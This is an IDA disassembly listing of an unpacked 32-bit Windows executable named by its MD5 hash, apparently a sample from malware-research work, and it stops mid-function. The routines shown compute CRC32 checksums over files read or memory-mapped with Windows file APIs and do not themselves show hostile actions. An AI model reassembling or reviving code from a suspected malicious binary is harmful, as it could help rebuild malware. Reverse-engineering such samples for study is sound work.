;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : B2D4BB8A547AED56B9C0A09F42744937
; File Name : u:\work\b2d4bb8a547aed56b9c0a09f42744937_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 420000
; Section 1. (virtual address 00001000)
; Virtual size : 00015000 ( 86016.)
; Section size in file : 00015000 ( 86016.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
HLXc segment para public 'CODE' use32
assume cs:HLXc
;org 421000h
assume es:nothing, ss:nothing, ds:HLXc, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421000 proc near ; CODE XREF: sub_424A53+28�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax+4], 0
mov ecx, [ebp+var_4]
mov dword ptr [ecx], offset off_4332D8
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_421000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421021 proc near ; CODE XREF: sub_4219B0+A�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax], offset off_4332D8
mov ecx, [ebp+var_4]
call sub_4210DD
mov esp, ebp
pop ebp
retn
sub_421021 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42103D proc near ; CODE XREF: sub_424A53+38�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
mov [ebp+var_18], ecx
mov [ebp+var_4], 0EDB88320h
mov ecx, [ebp+var_18]
call sub_4210DD
push 400h
call sub_431624
add esp, 4
mov [ebp+var_14], eax
mov eax, [ebp+var_18]
mov ecx, [ebp+var_14]
mov [eax+4], ecx
mov [ebp+var_C], 0
jmp short loc_421080
; ---------------------------------------------------------------------------
loc_421077: ; CODE XREF: sub_42103D+9A�j
mov edx, [ebp+var_C]
add edx, 1
mov [ebp+var_C], edx
loc_421080: ; CODE XREF: sub_42103D+38�j
cmp [ebp+var_C], 100h
jge short loc_4210D9
mov eax, [ebp+var_C]
mov [ebp+var_8], eax
mov [ebp+var_10], 8
jmp short loc_4210A1
; ---------------------------------------------------------------------------
loc_421098: ; CODE XREF: sub_42103D:loc_4210C6�j
mov ecx, [ebp+var_10]
sub ecx, 1
mov [ebp+var_10], ecx
loc_4210A1: ; CODE XREF: sub_42103D+59�j
cmp [ebp+var_10], 0
jle short loc_4210C8
mov edx, [ebp+var_8]
and edx, 1
test edx, edx
jz short loc_4210BE
mov eax, [ebp+var_8]
shr eax, 1
xor eax, [ebp+var_4]
mov [ebp+var_8], eax
jmp short loc_4210C6
; ---------------------------------------------------------------------------
loc_4210BE: ; CODE XREF: sub_42103D+72�j
mov ecx, [ebp+var_8]
shr ecx, 1
mov [ebp+var_8], ecx
loc_4210C6: ; CODE XREF: sub_42103D+7F�j
jmp short loc_421098
; ---------------------------------------------------------------------------
loc_4210C8: ; CODE XREF: sub_42103D+68�j
mov edx, [ebp+var_18]
mov eax, [edx+4]
mov ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [eax+ecx*4], edx
jmp short loc_421077
; ---------------------------------------------------------------------------
loc_4210D9: ; CODE XREF: sub_42103D+4A�j
mov esp, ebp
pop ebp
retn
sub_42103D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4210DD proc near ; CODE XREF: sub_421021+13�p
; sub_42103D+13�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
mov ecx, [eax+4]
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
push edx
call sub_43161E
add esp, 4
mov eax, [ebp+var_8]
mov dword ptr [eax+4], 0
mov esp, ebp
pop ebp
retn
sub_4210DD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421109 proc near ; CODE XREF: HLXc:004216A6�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_421109
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_10], esp
mov [ebp+var_14], 1
mov [ebp+var_4], 0
mov [ebp+var_1C], 0
mov [ebp+var_18], 0
lea eax, [ebp+var_18]
push eax
mov ecx, [ebp+arg_0]
push ecx
call dword_433024 ; GetFileSize
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0FFFFFFFFh
jnz short loc_42117B
call dword_433028 ; RtlGetLastWin32Error
test eax, eax
jz short loc_42117B
mov [ebp+var_14], 0
mov edx, [ebp+arg_4]
mov dword ptr [edx], 0
mov dword ptr [edx+4], 0
jmp short loc_42119B
; ---------------------------------------------------------------------------
loc_42117B: ; CODE XREF: sub_421109+50�j
; sub_421109+5A�j
mov eax, [ebp+var_18]
xor edx, edx
mov ecx, 20h
call sub_4316B0
mov ecx, [ebp+var_1C]
xor esi, esi
or eax, ecx
or edx, esi
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov [ecx+4], edx
loc_42119B: ; CODE XREF: sub_421109+70�j
jmp short loc_4211A7
; ---------------------------------------------------------------------------
loc_42119D: ; DATA XREF: HLXc:00434BE4�o
mov [ebp+var_14], 0
mov eax, offset loc_4211A7
retn
; ---------------------------------------------------------------------------
loc_4211A7: ; CODE XREF: sub_421109:loc_42119B�j
; DATA XREF: sub_421109+98�o
mov [ebp+var_4], 0FFFFFFFFh
mov al, [ebp+var_14]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_421109 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset sub_431C1A
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp-10h], esp
mov [ebp-1Ch], ecx
mov dword ptr [ebp-14h], 0
mov eax, [ebp+0Ch]
mov dword ptr [eax], 0FFFFFFFFh
mov dword ptr [ebp-4], 0
mov ecx, [ebp-1Ch]
cmp dword ptr [ecx+4], 0
jnz short loc_42121C
mov dword ptr [ebp-18h], 0
push offset dword_434DD0
lea edx, [ebp-18h]
push edx
call sub_4316EC ; _CxxThrowException
loc_42121C: ; CODE XREF: HLXc:00421205�j
; HLXc:00421241�j
mov eax, [ebp+8]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_421243
mov edx, [ebp+0Ch]
push edx
mov eax, [ebp+8]
mov cl, [eax]
push ecx
mov ecx, [ebp-1Ch]
call sub_4219E0
mov edx, [ebp+8]
add edx, 1
mov [ebp+8], edx
jmp short loc_42121C
; ---------------------------------------------------------------------------
loc_421243: ; CODE XREF: HLXc:00421224�j
jmp short loc_421252
; ---------------------------------------------------------------------------
loc_421245: ; DATA XREF: HLXc:00434C3C�o
mov dword ptr [ebp-14h], 17h
mov eax, offset loc_421252
retn
; ---------------------------------------------------------------------------
loc_421252: ; CODE XREF: HLXc:loc_421243�j
; DATA XREF: HLXc:0042124C�o
mov dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [ebp+0Ch]
mov ecx, [eax]
not ecx
mov edx, [ebp+0Ch]
mov [edx], ecx
mov eax, [ebp-14h]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_431C2E
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov eax, 108Ch
call sub_431700
push ebx
push esi
push edi
mov [ebp-10h], esp
mov [ebp-1084h], ecx
mov dword ptr [ebp-14h], 0
push 1
lea ecx, [ebp-70h]
call dword_43315C
mov dword ptr [ebp-4], 0
mov eax, [ebp+0Ch]
mov dword ptr [eax], 0FFFFFFFFh
mov byte ptr [ebp-4], 1
mov ecx, [ebp-1084h]
cmp dword ptr [ecx+4], 0
jnz short loc_4212F7
mov dword ptr [ebp-107Ch], 0
push offset dword_434DD0
lea edx, [ebp-107Ch]
push edx
call sub_4316EC ; _CxxThrowException
loc_4212F7: ; CODE XREF: HLXc:004212DA�j
mov eax, dword_433140
mov ecx, [eax]
push ecx
push 0A1h
mov edx, [ebp+8]
push edx
lea ecx, [ebp-70h]
call dword_433160
lea ecx, [ebp-70h]
call dword_433144
mov [ebp-1088h], eax
cmp dword ptr [ebp-1088h], 0
jnz short loc_42134D
mov eax, [ebp-70h]
mov ecx, [eax+4]
lea ecx, [ebp+ecx-70h]
call dword_433148
mov [ebp-108Ch], eax
mov edx, [ebp-108Ch]
mov [ebp-14h], edx
jmp loc_421400
; ---------------------------------------------------------------------------
loc_42134D: ; CODE XREF: HLXc:00421327�j
push 1000h
lea eax, [ebp-1078h]
push eax
lea ecx, [ebp-70h]
call dword_43314C
mov [ebp-1090h], eax
mov ecx, [ebp-1090h]
call dword_433150
mov [ebp-1094h], eax
mov ecx, [ebp-1094h]
mov [ebp-78h], ecx
loc_421383: ; CODE XREF: HLXc:004213F5�j
cmp dword ptr [ebp-78h], 0
jz short loc_4213F7
mov dword ptr [ebp-74h], 0
jmp short loc_42139B
; ---------------------------------------------------------------------------
loc_421392: ; CODE XREF: HLXc:004213BD�j
mov edx, [ebp-74h]
add edx, 1
mov [ebp-74h], edx
loc_42139B: ; CODE XREF: HLXc:00421390�j
mov eax, [ebp-74h]
cmp eax, [ebp-78h]
jge short loc_4213BF
mov ecx, [ebp+0Ch]
push ecx
mov edx, [ebp-74h]
mov al, [ebp+edx-1078h]
push eax
mov ecx, [ebp-1084h]
call sub_4219E0
jmp short loc_421392
; ---------------------------------------------------------------------------
loc_4213BF: ; CODE XREF: HLXc:004213A1�j
push 1000h
lea ecx, [ebp-1078h]
push ecx
lea ecx, [ebp-70h]
call dword_43314C
mov [ebp-1098h], eax
mov ecx, [ebp-1098h]
call dword_433150
mov [ebp-109Ch], eax
mov edx, [ebp-109Ch]
mov [ebp-78h], edx
jmp short loc_421383
; ---------------------------------------------------------------------------
loc_4213F7: ; CODE XREF: HLXc:00421387�j
lea ecx, [ebp-70h]
call dword_433154
loc_421400: ; CODE XREF: HLXc:00421348�j
jmp short loc_42140F
; ---------------------------------------------------------------------------
loc_421402: ; DATA XREF: HLXc:00434C9C�o
mov dword ptr [ebp-14h], 17h
mov eax, offset loc_42140F
retn
; ---------------------------------------------------------------------------
loc_42140F: ; CODE XREF: HLXc:loc_421400�j
; DATA XREF: HLXc:00421409�o
mov dword ptr [ebp-4], 0
lea ecx, [ebp-70h]
call dword_433144
test eax, eax
jz short loc_42142C
lea ecx, [ebp-70h]
call dword_433154
loc_42142C: ; CODE XREF: HLXc:00421421�j
mov eax, [ebp+0Ch]
mov ecx, [eax]
not ecx
mov edx, [ebp+0Ch]
mov [edx], ecx
mov eax, [ebp-14h]
mov [ebp-1080h], eax
mov dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp-70h]
call dword_433158
mov eax, [ebp-1080h]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42146A proc near ; CODE XREF: sub_424A53+46�p
var_102C = dword ptr -102Ch
var_1028 = dword ptr -1028h
var_1024 = dword ptr -1024h
var_1020 = byte ptr -1020h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_42146A
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov eax, 101Ch
call sub_431700
push ebx
push esi
push edi
mov [ebp+var_10], esp
mov [ebp+var_102C], ecx
mov [ebp+var_18], 0
mov [ebp+var_14], 0
mov eax, [ebp+arg_4]
mov dword ptr [eax], 0FFFFFFFFh
mov [ebp+var_4], 0
mov ecx, [ebp+var_102C]
cmp dword ptr [ecx+4], 0
jnz short loc_4214DE
mov [ebp+var_1028], 0
push offset dword_434DD0
lea edx, [ebp+var_1028]
push edx
call sub_4316EC ; _CxxThrowException
loc_4214DE: ; CODE XREF: sub_42146A+57�j
push 0
push 8000027h
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+arg_0]
push eax
call dword_433018 ; CreateFileA
mov [ebp+var_14], eax
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_421511
call dword_433028 ; RtlGetLastWin32Error
mov [ebp+var_18], eax
jmp loc_42159F
; ---------------------------------------------------------------------------
loc_421511: ; CODE XREF: sub_42146A+97�j
push 0
lea ecx, [ebp+var_1024]
push ecx
push 1000h
lea edx, [ebp+var_1020]
push edx
mov eax, [ebp+var_14]
push eax
call dword_43301C ; ReadFile
mov [ebp+var_20], eax
loc_421533: ; CODE XREF: sub_42146A+133�j
cmp [ebp+var_20], 0
jz short loc_42159F
cmp [ebp+var_1024], 0
jz short loc_42159F
mov [ebp+var_1C], 0
jmp short loc_421554
; ---------------------------------------------------------------------------
loc_42154B: ; CODE XREF: sub_42146A+10F�j
mov ecx, [ebp+var_1C]
add ecx, 1
mov [ebp+var_1C], ecx
loc_421554: ; CODE XREF: sub_42146A+DF�j
mov edx, [ebp+var_1C]
cmp edx, [ebp+var_1024]
jnb short loc_42157B
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+var_1C]
mov dl, [ebp+ecx+var_1020]
push edx
mov ecx, [ebp+var_102C]
call sub_4219E0
jmp short loc_42154B
; ---------------------------------------------------------------------------
loc_42157B: ; CODE XREF: sub_42146A+F3�j
push 0
lea eax, [ebp+var_1024]
push eax
push 1000h
lea ecx, [ebp+var_1020]
push ecx
mov edx, [ebp+var_14]
push edx
call dword_43301C ; ReadFile
mov [ebp+var_20], eax
jmp short loc_421533
; ---------------------------------------------------------------------------
loc_42159F: ; CODE XREF: sub_42146A+A2�j
; sub_42146A+CD�j ...
jmp short loc_4215AE
; ---------------------------------------------------------------------------
loc_4215A1: ; DATA XREF: HLXc:00434CF4�o
mov [ebp+var_18], 17h
mov eax, offset loc_4215AE
retn
; ---------------------------------------------------------------------------
loc_4215AE: ; CODE XREF: sub_42146A:loc_42159F�j
; DATA XREF: sub_42146A+13E�o
mov [ebp+var_4], 0FFFFFFFFh
cmp [ebp+var_14], 0
jz short loc_4215C5
mov eax, [ebp+var_14]
push eax
call dword_433020 ; CloseHandle
loc_4215C5: ; CODE XREF: sub_42146A+14F�j
mov ecx, [ebp+arg_4]
mov edx, [ecx]
not edx
mov eax, [ebp+arg_4]
mov [eax], edx
mov eax, [ebp+var_18]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
sub_42146A endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset sub_431C42
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
sub esp, 38h
push ebx
push esi
push edi
mov [ebp-10h], esp
mov [ebp-44h], ecx
mov dword ptr [ebp-1Ch], 0
mov dword ptr [ebp-18h], 0
mov dword ptr [ebp-14h], 0
mov eax, [ebp+0Ch]
mov dword ptr [eax], 0FFFFFFFFh
mov dword ptr [ebp-4], 0
mov ecx, [ebp-44h]
cmp dword ptr [ecx+4], 0
jnz short loc_42164F
mov dword ptr [ebp-40h], 0
push offset dword_434DD0
lea edx, [ebp-40h]
push edx
call sub_4316EC ; _CxxThrowException
loc_42164F: ; CODE XREF: HLXc:00421638�j
push 0
push 8000027h
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+8]
push eax
call dword_433018 ; CreateFileA
mov [ebp-18h], eax
cmp dword ptr [ebp-18h], 0FFFFFFFFh
jnz short loc_421682
call dword_433028 ; RtlGetLastWin32Error
mov [ebp-1Ch], eax
jmp loc_4217D5
; ---------------------------------------------------------------------------
loc_421682: ; CODE XREF: HLXc:00421672�j
mov dword ptr [ebp-2Ch], 0
mov dword ptr [ebp-28h], 0
mov dword ptr [ebp-24h], 0
mov dword ptr [ebp-20h], 0
lea ecx, [ebp-2Ch]
push ecx
mov edx, [ebp-18h]
push edx
call sub_421109
add esp, 8
mov [ebp-48h], al
mov eax, [ebp-48h]
and eax, 0FFh
test eax, eax
jnz short loc_4216C9
mov dword ptr [ebp-1Ch], 18h
jmp loc_4217D5
; ---------------------------------------------------------------------------
loc_4216C9: ; CODE XREF: HLXc:004216BB�j
mov ecx, [ebp-2Ch]
or ecx, [ebp-28h]
test ecx, ecx
jz loc_4217D5
push 0
push 0
push 0
push 2
push 0
mov edx, [ebp-18h]
push edx
call dword_433074 ; CreateFileMappingA
mov [ebp-14h], eax
cmp dword ptr [ebp-14h], 0
jnz short loc_421702
call dword_433028 ; RtlGetLastWin32Error
mov [ebp-1Ch], eax
jmp loc_4217D5
; ---------------------------------------------------------------------------
loc_421702: ; CODE XREF: HLXc:004216F2�j
; HLXc:004217D0�j
cmp dword ptr [ebp-28h], 0
jl loc_4217D5
jg short loc_421718
cmp dword ptr [ebp-2Ch], 0
jbe loc_4217D5
loc_421718: ; CODE XREF: HLXc:0042170C�j
cmp dword ptr [ebp-28h], 0
jg short loc_421731
jl short loc_421729
cmp dword ptr [ebp-2Ch], 0A00000h
jnb short loc_421731
loc_421729: ; CODE XREF: HLXc:0042171E�j
mov eax, [ebp-2Ch]
mov [ebp-38h], eax
jmp short loc_421738
; ---------------------------------------------------------------------------
loc_421731: ; CODE XREF: HLXc:0042171C�j
; HLXc:00421727�j
mov dword ptr [ebp-38h], 0A00000h
loc_421738: ; CODE XREF: HLXc:0042172F�j
mov ecx, [ebp-38h]
push ecx
mov edx, [ebp-24h]
push edx
mov ecx, 20h
mov eax, [ebp-24h]
mov edx, [ebp-20h]
call sub_431730
and edx, 0
push eax
push 4
mov eax, [ebp-14h]
push eax
call dword_433070 ; MapViewOfFile
mov [ebp-34h], eax
mov ecx, [ebp-38h]
mov [ebp-30h], ecx
mov edx, [ebp-34h]
mov [ebp-3Ch], edx
loc_42176F: ; CODE XREF: HLXc:0042179A�j
mov eax, [ebp-30h]
mov ecx, [ebp-30h]
sub ecx, 1
mov [ebp-30h], ecx
test eax, eax
jbe short loc_42179C
mov edx, [ebp+0Ch]
push edx
mov eax, [ebp-3Ch]
mov cl, [eax]
push ecx
mov ecx, [ebp-44h]
call sub_4219E0
mov edx, [ebp-3Ch]
add edx, 1
mov [ebp-3Ch], edx
jmp short loc_42176F
; ---------------------------------------------------------------------------
loc_42179C: ; CODE XREF: HLXc:0042177D�j
mov eax, [ebp-34h]
push eax
call dword_433044 ; UnmapViewOfFile
mov ecx, [ebp-38h]
xor edx, edx
mov eax, [ebp-24h]
add eax, ecx
mov ecx, [ebp-20h]
adc ecx, edx
mov [ebp-24h], eax
mov [ebp-20h], ecx
mov edx, [ebp-38h]
xor eax, eax
mov ecx, [ebp-2Ch]
sub ecx, edx
mov edx, [ebp-28h]
sbb edx, eax
mov [ebp-2Ch], ecx
mov [ebp-28h], edx
jmp loc_421702
; ---------------------------------------------------------------------------
loc_4217D5: ; CODE XREF: HLXc:0042167D�j
; HLXc:004216C4�j ...
jmp short loc_4217E4
; ---------------------------------------------------------------------------
loc_4217D7: ; DATA XREF: HLXc:00434D4C�o
mov dword ptr [ebp-1Ch], 17h
mov eax, offset loc_4217E4
retn
; ---------------------------------------------------------------------------
loc_4217E4: ; CODE XREF: HLXc:loc_4217D5�j
; DATA XREF: HLXc:004217DE�o
mov dword ptr [ebp-4], 0FFFFFFFFh
cmp dword ptr [ebp-18h], 0
jz short loc_4217FB
mov eax, [ebp-18h]
push eax
call dword_433020 ; CloseHandle
loc_4217FB: ; CODE XREF: HLXc:004217EF�j
cmp dword ptr [ebp-14h], 0
jz short loc_42180B
mov ecx, [ebp-14h]
push ecx
call dword_433020 ; CloseHandle
loc_42180B: ; CODE XREF: HLXc:004217FF�j
mov edx, [ebp+0Ch]
mov eax, [edx]
not eax
mov ecx, [ebp+0Ch]
mov [ecx], eax
mov eax, [ebp-1Ch]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset sub_431C4C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov eax, 1018h
call sub_431700
push ebx
push esi
push edi
mov [ebp-10h], esp
mov [ebp-1028h], ecx
mov dword ptr [ebp-18h], 0
mov dword ptr [ebp-14h], 0
mov eax, [ebp+0Ch]
mov dword ptr [eax], 0FFFFFFFFh
mov dword ptr [ebp-4], 0
mov ecx, [ebp-1028h]
cmp dword ptr [ecx+4], 0
jnz short loc_4218A1
mov dword ptr [ebp-1024h], 0
push offset dword_434DD0
lea edx, [ebp-1024h]
push edx
call sub_4316EC ; _CxxThrowException
loc_4218A1: ; CODE XREF: HLXc:00421884�j
push 0
push 8000027h
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+8]
push eax
call dword_433018 ; CreateFileA
mov [ebp-14h], eax
cmp dword ptr [ebp-14h], 0FFFFFFFFh
jnz short loc_4218D4
call dword_433028 ; RtlGetLastWin32Error
mov [ebp-18h], eax
jmp loc_421964
; ---------------------------------------------------------------------------
loc_4218D4: ; CODE XREF: HLXc:004218C4�j
push 0
lea ecx, [ebp-1020h]
push ecx
push 1000h
lea edx, [ebp-101Ch]
push edx
mov eax, [ebp-14h]
push eax
call dword_43301C ; ReadFile
mov [ebp-1Ch], eax
loc_4218F6: ; CODE XREF: HLXc:00421962�j
cmp dword ptr [ebp-1Ch], 0
jz short loc_421964
cmp dword ptr [ebp-1020h], 0
jz short loc_421964
push esi
push edi
mov eax, [ebp+0Ch]
mov ecx, [eax]
mov ebx, [ebp-1028h]
mov edi, [ebx+4]
lea esi, [ebp-101Ch]
mov ebx, [ebp-1020h]
lea edx, [esi+ebx]
loc_421924: ; CODE XREF: HLXc:00421937�j
xor eax, eax
mov bl, [esi]
mov al, cl
inc esi
xor al, bl
shr ecx, 8
mov ebx, [edi+eax*4]
xor ecx, ebx
cmp edx, esi
jnz short loc_421924
pop edi
pop esi
mov eax, [ebp+0Ch]
mov [eax], ecx
push 0
lea ecx, [ebp-1020h]
push ecx
push 1000h
lea edx, [ebp-101Ch]
push edx
mov eax, [ebp-14h]
push eax
call dword_43301C ; ReadFile
mov [ebp-1Ch], eax
jmp short loc_4218F6
; ---------------------------------------------------------------------------
loc_421964: ; CODE XREF: HLXc:004218CF�j
; HLXc:004218FA�j ...
jmp short loc_421973
; ---------------------------------------------------------------------------
loc_421966: ; DATA XREF: HLXc:00434DA4�o
mov dword ptr [ebp-18h], 17h
mov eax, offset loc_421973
retn
; ---------------------------------------------------------------------------
loc_421973: ; CODE XREF: HLXc:loc_421964�j
; DATA XREF: HLXc:0042196D�o
mov dword ptr [ebp-4], 0FFFFFFFFh
cmp dword ptr [ebp-14h], 0
jz short loc_42198A
mov ecx, [ebp-14h]
push ecx
call dword_433020 ; CloseHandle
loc_42198A: ; CODE XREF: HLXc:0042197E�j
mov edx, [ebp+0Ch]
mov eax, [edx]
not eax
mov ecx, [ebp+0Ch]
mov [ecx], eax
mov eax, [ebp-18h]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4219B0 proc near ; DATA XREF: HLXc:off_4332D8�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_421021
mov eax, [ebp+arg_0]
and eax, 1
test eax, eax
jz short loc_4219D5
mov ecx, [ebp+var_4]
push ecx
call sub_43161E
add esp, 4
loc_4219D5: ; CODE XREF: sub_4219B0+17�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_4219B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4219E0 proc near ; CODE XREF: HLXc:00421233�p
; HLXc:004213B8�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_4]
mov ecx, [eax]
shr ecx, 8
mov edx, [ebp+arg_0]
and edx, 0FFh
mov eax, [ebp+arg_4]
mov eax, [eax]
and eax, 0FFh
xor edx, eax
mov eax, [ebp+var_4]
mov eax, [eax+4]
xor ecx, [eax+edx*4]
mov edx, [ebp+arg_4]
mov [edx], ecx
mov esp, ebp
pop ebp
retn 8
sub_4219E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421A20 proc near ; CODE XREF: sub_425D38+D0�p
; sub_425D38+15B�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
mov [ebp+var_4], 0
loc_421A30: ; CODE XREF: sub_421A20+3C�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_421A5E
mov edx, [ebp+arg_0]
add edx, [ebp+var_4]
movsx eax, byte ptr [edx]
movsx ecx, [ebp+arg_4]
cmp eax, ecx
jnz short loc_421A53
mov eax, [ebp+var_4]
jmp short loc_421A61
; ---------------------------------------------------------------------------
loc_421A53: ; CODE XREF: sub_421A20+2C�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
jmp short loc_421A30
; ---------------------------------------------------------------------------
loc_421A5E: ; CODE XREF: sub_421A20+1B�j
or eax, 0FFFFFFFFh
loc_421A61: ; CODE XREF: sub_421A20+31�j
mov esp, ebp
pop ebp
retn 8
sub_421A20 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
mov [ebp-8], ecx
mov dword ptr [ebp-4], 0
loc_421A77: ; CODE XREF: HLXc:00421A8D�j
mov eax, [ebp+8]
add eax, [ebp-4]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_421A8F
mov edx, [ebp-4]
add edx, 1
mov [ebp-4], edx
jmp short loc_421A77
; ---------------------------------------------------------------------------
loc_421A8F: ; CODE XREF: HLXc:00421A82�j
mov eax, [ebp-4]
sub eax, 1
mov [ebp-4], eax
loc_421A98: ; CODE XREF: HLXc:00421AC4�j
mov ecx, [ebp+8]
add ecx, [ebp-4]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_421AC6
mov eax, [ebp+8]
add eax, [ebp-4]
movsx ecx, byte ptr [eax]
movsx edx, byte ptr [ebp+0Ch]
cmp ecx, edx
jnz short loc_421ABB
mov eax, [ebp-4]
jmp short loc_421AC9
; ---------------------------------------------------------------------------
loc_421ABB: ; CODE XREF: HLXc:00421AB4�j
mov eax, [ebp-4]
sub eax, 1
mov [ebp-4], eax
jmp short loc_421A98
; ---------------------------------------------------------------------------
loc_421AC6: ; CODE XREF: HLXc:00421AA3�j
or eax, 0FFFFFFFFh
loc_421AC9: ; CODE XREF: HLXc:00421AB9�j
mov esp, ebp
pop ebp
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421ACF proc near ; CODE XREF: HLXc:004225F7�p
; sub_42309C+D8�p ...
var_2008 = dword ptr -2008h
var_2004 = dword ptr -2004h
var_2000 = byte ptr -2000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, 2008h
call sub_431700
mov [ebp+var_2008], ecx
mov [ebp+var_2004], 0
push 2000h
push 0
push offset a8b ; "8B"
call sub_431752 ; memset
add esp, 0Ch
loc_421B00: ; CODE XREF: sub_421ACF:loc_421B5E�j
mov eax, [ebp+arg_4]
add eax, [ebp+arg_8]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_421B60
mov edx, [ebp+arg_4]
add edx, [ebp+arg_8]
movsx eax, byte ptr [edx]
push eax
push offset dword_43702C
lea ecx, [ebp+var_2000]
push ecx
call dword_4331E0 ; sprintf
add esp, 0Ch
lea edx, [ebp+var_2000]
push edx
push offset a8b ; "8B"
